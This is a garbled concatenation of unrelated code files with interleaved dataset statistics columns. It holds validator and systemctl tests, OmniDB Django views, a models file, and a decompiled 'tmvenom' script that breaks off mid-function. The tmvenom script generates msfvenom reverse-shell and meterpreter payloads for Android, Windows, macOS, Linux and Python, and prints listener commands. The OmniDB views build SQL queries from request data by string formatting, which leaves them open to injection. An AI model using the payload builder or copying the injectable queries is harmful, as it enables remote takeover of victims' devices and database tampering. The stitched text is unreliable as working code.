with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"foo": "bar"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_repeat_also():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").also.also
def test_default():
valid = Query.can_have("test").with_default("test")
query = {}
assert valid(query)
assert query == {"test": "test"}
def test_bad_default():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").with_default("test")
def test_wrong_default_type():
valid = Query.can_have("test").with_default("test")
with pytest.raises(QueryValidationError):
valid({"test": 1})
def test_no_default_type():
valid = Query.can_have("test").with_default("test")
query = {"test": "dog"}
assert valid(query)
assert query == {"test": "dog"}
def test_default_supplier():
x = 0
def supplier(query, context):
nonlocal x
x += 1
return "test"
valid = Query.can_have("test").with_default(supplier, str)
query = {"test": "dog"}
assert valid(query)
assert query == {"test": "dog"}
assert x == 0
with pytest.raises(QueryValidationError):
valid({"test": 1})
assert x == 0
query = {}
assert valid(query)
assert query == {"test": "test"}
assert x == 1
query = {}
assert valid(query)
assert query == {"test": "test"}
assert x == 2
def test_validate_decorator():
def pre_transform(query):
if "test0" in query:
query["test1"] = query["test0"]
def pre_transform2(query):
if "test1" in query:
query["test2"] = int(query["test1"])
validator = Query.has("test1").as_(str).also.has("test2").as_(int)
@validate_query(validator, pre_transform, pre_transform2)
def get(self, query, context=None):
return query["test2"]
with pytest.raises(QueryValidationError):
get(None, {"cat": "dog"})
with pytest.raises(ValueError):
get(None, {"test1": "one"})
assert get(None, {"test0": "1"}) == 1
| 25.658537
| 99
| 0.608292
| 1,627
| 13,676
| 4.975415
| 0.036263
| 0.106238
| 0.169981
| 0.31575
| 0.904138
| 0.880791
| 0.857072
| 0.804077
| 0.780852
| 0.756269
| 0
| 0.008053
| 0.201009
| 13,676
| 532
| 100
| 25.706767
| 0.732772
| 0
| 0
| 0.717143
| 0
| 0
| 0.101199
| 0
| 0
| 0
| 0
| 0
| 0.271429
| 1
| 0.111429
| false
| 0
| 0.005714
| 0.002857
| 0.122857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
904eedf1ccbd7ef50bd20c023fb29d448a0583e1
| 1,702
|
py
|
Python
|
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | 7
|
2022-03-30T14:33:39.000Z
|
2022-03-31T21:45:41.000Z
|
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | null | null | null |
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | 3
|
2022-03-30T09:27:47.000Z
|
2022-03-30T14:32:30.000Z
|
# systemctl reload-or-restart: successful reload.
def test_systemctl_reload_or_restart_ok(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert not service.did("restart")
# systemctl reload-or-restart: the service is not running.
def test_systemctl_reload_or_restart_stopped(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 7)
service.will_do("restart", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
# systemctl reload-or-restart: reload is unsupported.
def test_systemctl_reload_or_restart_unsup(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 3)
service.will_do("restart", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
# systemctl reload-or-restart: both commands failed.
def test_systemctl_reload_or_restart_fail(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 3)
service.will_do("restart", 1)
out, err, status = service.invoke("reload-or-restart")
assert status == 1
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
| 34.04
| 58
| 0.710928
| 225
| 1,702
| 5.222222
| 0.164444
| 0.081702
| 0.153191
| 0.163404
| 0.895319
| 0.895319
| 0.789787
| 0.754894
| 0.754894
| 0.754894
| 0
| 0.007703
| 0.160987
| 1,702
| 49
| 59
| 34.734694
| 0.815126
| 0.121622
| 0
| 0.769231
| 0
| 0
| 0.134899
| 0
| 0
| 0
| 0
| 0
| 0.410256
| 1
| 0.102564
| false
| 0
| 0
| 0
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
90631e8dec3aa5dff016f85b27cd5e9e8efec9d6
| 8,373
|
py
|
Python
|
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | 1
|
2019-05-29T19:46:28.000Z
|
2019-05-29T19:46:28.000Z
|
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | null | null | null |
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | 1
|
2019-03-11T06:57:43.000Z
|
2019-03-11T06:57:43.000Z
|
from django.http import HttpResponse
from django.template import loader
from django.http import JsonResponse
from django.core import serializers
import json
import sys
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
from OmniDB_app.include.Session import Session
def get_node_children(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
if not v_sn_id_parent:
v_filter = ' is null'
else:
v_filter = ' = {0}'.format(v_sn_id_parent)
v_return['v_data'] = {
'v_list_nodes': [],
'v_list_texts': []
}
try:
#Child nodes
v_child_nodes = v_session.v_omnidb_database.v_connection.Query('''
select sn_id, sn_name
from snippets_nodes
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_node in v_child_nodes.Rows:
v_node_data = {
'v_id': v_node['sn_id'],
'v_name': v_node['sn_name']
}
v_return['v_data']['v_list_nodes'].append(v_node_data)
#Child texts
v_child_texts = v_session.v_omnidb_database.v_connection.Query('''
select st_id, st_name
from snippets_texts
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_text in v_child_texts.Rows:
v_text_data = {
'v_id': v_text['st_id'],
'v_name': v_text['st_name']
}
v_return['v_data']['v_list_texts'].append(v_text_data)
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def get_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_st_id = json_object['p_st_id']
try:
v_return['v_data'] = v_session.v_omnidb_database.v_connection.ExecuteScalar('''
select st_text
from snippets_texts
where st_id = {0}
'''.format(v_st_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def new_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
v_mode = json_object['p_mode']
v_name = json_object['p_name']
if not v_sn_id_parent:
v_sn_id_parent = 'null'
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_nodes values (
(select coalesce(max(sn_id), 0) + 1 from snippets_nodes),'{0}',{1},'','',{2})
'''.format(v_name,v_session.v_user_id,v_sn_id_parent))
else:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','','','',{1},{2})
'''.format(v_name,v_sn_id_parent,v_session.v_user_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def delete_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_mode = json_object['p_mode']
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_nodes
where sn_id = {0}
'''.format(v_id))
else:
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_texts
where st_id = {0}
'''.format(v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def save_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_text = json_object['p_text']
try:
#new snippet
if not v_id:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','{1}','','',null,{2})
'''.format(v_name,v_text.replace("'", "''"),v_session.v_user_id))
#existing snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_text = '{0}'
where st_id = {1}
'''.format(v_text.replace("'", "''"),v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def rename_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_mode = json_object['p_mode']
try:
#node
if v_mode=='node':
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_nodes
set sn_name = '{0}'
where sn_id = {1}
'''.format(v_name,v_id))
#snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_name = '{0}'
where st_id = {1}
'''.format(v_name,v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
| 29.378947
| 100
| 0.59668
| 1,135
| 8,373
| 4.05022
| 0.079295
| 0.112682
| 0.114858
| 0.084838
| 0.831412
| 0.788993
| 0.777029
| 0.719817
| 0.719817
| 0.686535
| 0
| 0.00679
| 0.278873
| 8,373
| 284
| 101
| 29.482394
| 0.754554
| 0.017915
| 0
| 0.723005
| 0
| 0.014085
| 0.270247
| 0.014371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.046948
| 0
| 0.159624
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
906e16682f09e909f60faa5ee64cddeee2a6081b
| 848
|
py
|
Python
|
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from django.conf import settings
from django.db import models
class Teacher(models.Model):
"Generated Model"
name = models.CharField(
max_length=256,
)
email = models.EmailField(
max_length=254,
)
class Student(models.Model):
"Generated Model"
name = models.CharField(
max_length=256,
)
email = models.EmailField(
max_length=254,
)
phone = models.DecimalField(
max_digits=30,
decimal_places=10,
)
class Login(models.Model):
"Generated Model"
email = models.EmailField(
max_length=254,
)
password = models.CharField(
max_length=256,
)
class Signup(models.Model):
"Generated Model"
email = models.EmailField(
max_length=254,
)
password = models.CharField(
max_length=256,
)
| 18.042553
| 32
| 0.613208
| 91
| 848
| 5.604396
| 0.32967
| 0.141176
| 0.156863
| 0.196078
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0
| 0.046512
| 0.290094
| 848
| 46
| 33
| 18.434783
| 0.800664
| 0.074292
| 0
| 0.526316
| 1
| 0
| 0.070755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.052632
| 0.052632
| 0
| 0.394737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
909bb82026a323d4f0adb7e8d9292dec8f6a2762
| 25,438
|
py
|
Python
|
tmvenom/tmvenom2_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
tmvenom/tmvenom2_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
tmvenom/tmvenom2_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Decompiled by HTR-TECH | TAHMID RAYAT
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : patched.pyc
# Bytecode Version : 2.7
#---------------------------------------
import os
import sys
import colorama
from colorama import *
import time
red = '\x1b[1;91m'
green = '\x1b[1;92m'
yellow = '\x1b[1;93m'
blue = '\x1b[1;94m'
purple = '\x1b[1;95m'
cyan = '\x1b[1;96m'
white = '\x1b[1;97m'
os.system('clear')
os.system('sh /data/data/com.termux/files/home/tmvenom/core/run2')
os.system('clear')
def pt():
print ''
def logo():
print '\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97'
print '\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d'
print '\x1b[1;91m'
slowprint(' < Developed By \x1b[1;96m Technical Mujeeb' + ' \x1b[1;91m for Termux users >')
def auth():
print '\x1b[1;92m'
slowprint('Loading Author Information.....')
print '\x1b[1;92m'
slowprint('-------------------------------------------------------')
slowprint('|' + red + ' <=> ' + green + 'Name ' + red + '=' + cyan + ' Mujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Youtube ' + red + '=' + cyan + ' www.youtube.com/technicalmujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Github ' + red + '=' + cyan + ' https://github.com/TechnicalMujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'whatsapp ' + red + '=' + cyan + ' Termux Cyber ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'telegram ' + red + '=' + cyan + ' Termux Cyber [community] ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Instagram ' + red + '=' + cyan + ' @Technical_Mujeeb ' + green + '|')
slowprint('|------------------------------------------------------')
print ''
again()
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(1 / 100)
def again():
run = raw_input('\x1b[1;91m\n[e]\x1b[1;92mExit\x1b[1;96m or \x1b[1;91m[Enter]\x1b[1;92m continue ? = \x1b[1;96m ')
if run == 'e':
slowprint('Exiting......')
print ''
else:
os.system('clear')
menu()
def android():
pt()
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/mob.apk'
pt()
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p android/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' R > ' + pay)
print ''
print green + 'Successfully Generated'
print ''
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
print ''
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload android/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
print ''
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
os.system('service postgresql start')
os.system('msfconsole')
menu()
else:
menu()
def windows():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/win.exe'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f exe -a x86 > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload windows/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def mac():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/mac.macho'
pt()
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p osx/x86/shell_reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f macho > ' + pay)
pt()
print Fore.YELLOW + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload osx/x86/shell_reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def linux():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/linux.elf'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print Fore.GREEN + 'Generating payload.....'
pt()
os.system('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f elf > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
pt()
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload linux/x86/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT MSFCONSOLE STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def python():
print ''
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recomended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recomended path & name = /sdcard/back.py'
print ''
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p python/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -o ' + pay)
pt()
print yellow + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Are You want to start listner (y/n) => ')
if yan == 'y':
print ''
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
